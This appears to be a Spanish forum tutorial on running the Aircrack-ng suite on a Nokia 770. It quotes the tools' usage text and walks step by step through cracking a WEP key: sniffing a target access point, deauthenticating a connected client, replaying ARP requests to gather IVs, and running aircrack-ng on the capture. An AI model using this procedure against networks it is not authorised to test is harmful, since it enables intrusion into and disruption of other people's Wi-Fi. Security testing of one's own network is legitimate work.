-Post en Construcción-[span style=\'font-size:25pt;line-height:100%\']
Aircrack-ng[/span]
Aircrack-ng 0.5 es un paquete de herramientas destinadas al monitoreo y análisis de redes inhalámbricas con el que podremos poner a prueba la seguridad del cifrado de conexiones WEP (Wired Equivalent Privacy) y WPA (Wi-Fi Protected Access).
Una vez ejecutemos el programa, podremos capturar paquetes de información de una red concreta (o de las que sea capaz de detectar nuestra tarjeta) con una de las herramientas incluidas en Aircrack-ng 0.5: Airodump, un sniffer que se encargará de capturar los paquetes necesarios para llevar a cabo la operación con éxito.
Cuando los paquetes capturados sean suficientes, sólo tendremos que cargarlos con Aircrack para que éste descifre la clave y podamos acceder a la red a la que pertenezcan.
Nota:
Aircrack trabaja con WEP 802.11 y WAP-PSK.
* HomePage:
http://www.aircrack-ng.org * Status: stable
* PortPage:
http://www.mulliner.org/nokia770/ * Download:
http://www.mulliner.org/nokia770/feed/airc...g_0.5-1_arm.deb The
aircrack-ng wireless security toolkit. Requires shell access and root.
mug-usbnet
Necesitamos
Xterm y derechos de superusuario
X Terminal Emulator (xterm)* Home Page:
http://770.fs-security.com/xterm/ http://maemo-hackers.org/wiki/OssoXterm
*********************************************************
*********************************************************
[span style=\'font-size:25pt;line-height:100%\']
VAMOS CON LOS COMANDOS Y PROGRAMAS DE LA SUITE [/span]
[span style=\'font-size:30pt;line-height:100%\']
Aircrack-ng del N770[/span]
**********************************************************
**********************************************************
Nokia770-39:~# aircrack-ng Aircrack-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage:
aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-q : enable quiet mode (no status output)
Static WEP cracking options: -c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d <start> : debug - specify beginning of the key
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length : 64/128/152/256/512
-i <index> : WEP key index (1 to 4), default: any
-f <fudge> : bruteforce fudge factor, default: 2
-k <korek> : disable one attack method (1 to 17)
-x : disable two last keybytes bruteforce
-y : experimental single bruteforce mode
WPA-PSK cracking options: -w <words> : path to a dictionary file
**********************************************************
**********************************************************
Nokia770-39:~# aireplay-ng Aireplay-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage:
aireplay-ng <options> <replay interface> filter options: -b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options: -x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
source options: -i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes: --deauth count : deauthenticate all stations
--fakeauth delay : fake authentication with AP
--interactive : interactive frame selection
--arpreplay : standard ARP-request replay
--chopchop : decrypt/chopchop WEP packet
**********************************************************
**********************************************************
Nokia770-39:~# airodump-ng Airodump-ng 0.5 - © 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org usage:
airodump-ng <options> <interface> Options: --ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix (mandatory)
-w : same as --write
By default, airodump-ng hop on 2.4Ghz channels.
You can make it capture on other/specific channel(s) by using: --channel <channel> : Capture on a specific channel
-c : Same as --channel
-a : Will hop on 5Ghz channels
--abg : Will hop on 2.4Ghz channels
**********************************************************
**********************************************************
[span style=\'font-size:25pt;line-height:100%\']Ejemplo de uso;[/span]
1. Con
Kismet o con
airodump-ng seleccionar el AP (punto de acceso) "objetivo", desde Kismet, clasificar los AP's usando "S" seguido de "C". Seleccionar tu AP "Enter" para coger la información (MAC Address, WEP, Channel etc.) Presiona "q" para dejar la pantalla, y con mi AP selecciona tecleando "L"
2. Abrir consola de comandos, AiroDump para "sniffar" los paquetes
Cmd=
airodump-ng -w capture -c 0 wlan0
OK, "airodump-ng" es el programa de la suite de aircrack
"-w capture" Captura -write- los packetes sniffados con extensión "capture.cap".
"-c 0" Selecciona el nº de canal "0", del ejemplo "sniffara" de todos los canales, seleccionado un número del 1 al 11, del objetivo elegido solamente.
"wlan0" El nombre de mi dispositivo wireless dado por el tipo de chipset "Prism2"
Desde airodump-ng, seleccionamos la MAC address del objetivo AP y los packets/data capturados los Data IV's)
3. Abrir otra consola, con AirePlay realizamos un ataque para "deautenticacar a la maquina seleccionada "el objetivo" conectado al AP para desconectar la maquina seleccionada y forzar la reconexión con el AP, en este proceso el AP enviara paquetes que incluiran la WEP key.
Cmd =
aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 wlan0
"aireplay-ng" incluido en la suite aircrack-ng
"-e DLINK" nombre del SSID del objetivo del AP.
"-a 00:11:22:33:44:55" MAC address del objetivo AP.
"-c 66:77:88:99:00:AA" es la MAC address de la maquina seleccionada conectada al AP (debes poder encontrar cualquier máquina conectada con el AP, observando la Info de AiroDump).
"--deauth 10" el tipo de ataque realizado, al este caso, el ataque de DEAUTH repetido 10 veces.
"wlan0" el nombre de mi AP.
Preparamos este comando pero no lo enviamos todavia (recomendado el copy-paste al carecer de teclado fisico)
4. Abrir otra pantalla en consola, volver a AIREPLAY, capturar los paquetes que pudieran contener cualquier dato, bombear al AP “fingiendo” ser la máquina receptora que el otro caso de Aireplay realizó el ataque de DEAUTH
Cmd=
aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA wlan0
"aireplay-ng" otro programa de la suite aircrack-ng
"--arpreplay" es la funcion de aireplay planificada, en este caso repite una peticion ARP, que contendra paquetes IV´s
"-b 00:11:22:33:44:55" MAC del objetivo AP.
"-h 66:77:88:99:00:AA" MAC de la maquina seleccionada conectada al AP. STATION
"wlan0" ...
Lanzado el comando, deberia de buscar los paquetes.
El commando anterior inicia la deautenticación, cambiar a aireplay (lo teniamos preparado) en la otra pantalla. Deberias de detectar deauth/discon de la maquina, que captura paquetes, y comenzar a bombardear al nuevo AP by simulando ser la maquina receptora.
Clickar sobre la ventana de airodump y esperar a conseguir paquetes y IV resultante de la inyección.
Puedes cerrar la ventada de deautenticacion de aireplay "una vez asociados los puntos AP de atacante y Objetivo" y dejar la otra ventana, llamando "petición de ARP" -replaying- hasta conseguir los paquetes necesarios para crackear la llave WEP.
5. Abrir la pantalla FINAL de la consola, AirCrack explorara los paquetes capturados de AiroDump.
Cmd=
aircrack-ng -f 4 -m 00:11:22:33:44:55 -n 64 capture.cap
"aircrack-ng" Nombre del programa de la misma suite.
"-f 4" corre el Fudgefactor 4 veces
"-m 00:11:22:33:44:55" MAC address del objetivo AP.
"-n 64" los pedacitos de bits que componen la key, puede ser de 64-bit, de 128-bit... etc.
"capture.cap" Nombre del "file" capturado por AiroDump "puedes poner el que te plazca.
Encender y apagar, depende de la velocidad de tu PC, pocos IV's pueden contener tu key si es debil (yo con 80.000 una vez me hice con una) lo normal suelen ser 250.000 paquetes, algunas veces la cosa se desmadra hasta el Millón (si) 1.000.000 de paquetes... y BINGO! encontraras la key.
Testarlo sobre tú propio AP para comprobar la seguridad de vuestra key, podeis usar vuestro N770.
************************************************************
************************************************************
**********************************************************
**********************************************************
[span style=\'font-size:25pt;line-height:100%\']
Problemas que plantea "
aircrack-ng" en nuestro gachet Nokia 770
[/span]
* La captura de paqutes "IV´s, CAP´s, se realiza en "root/directorio" de flash memory (64 Mb) lo que conlleva un pequeño inconevniente de reduccion de rendimiento según aumentan los paquetes y se achica nuestra flash
- el comando rm, elimina los paquetes de "cd root" tras un ls, "rm paquete.iv"
* el cmd;
airmon-ng ¡dá un
ERROR!
/usr/sbin/iwpriv
usage: airmon-ng [channel]
Interface Chipset Driver
/usr/sbin/airmon-ng: 16: Syntax C: "(" unexpected)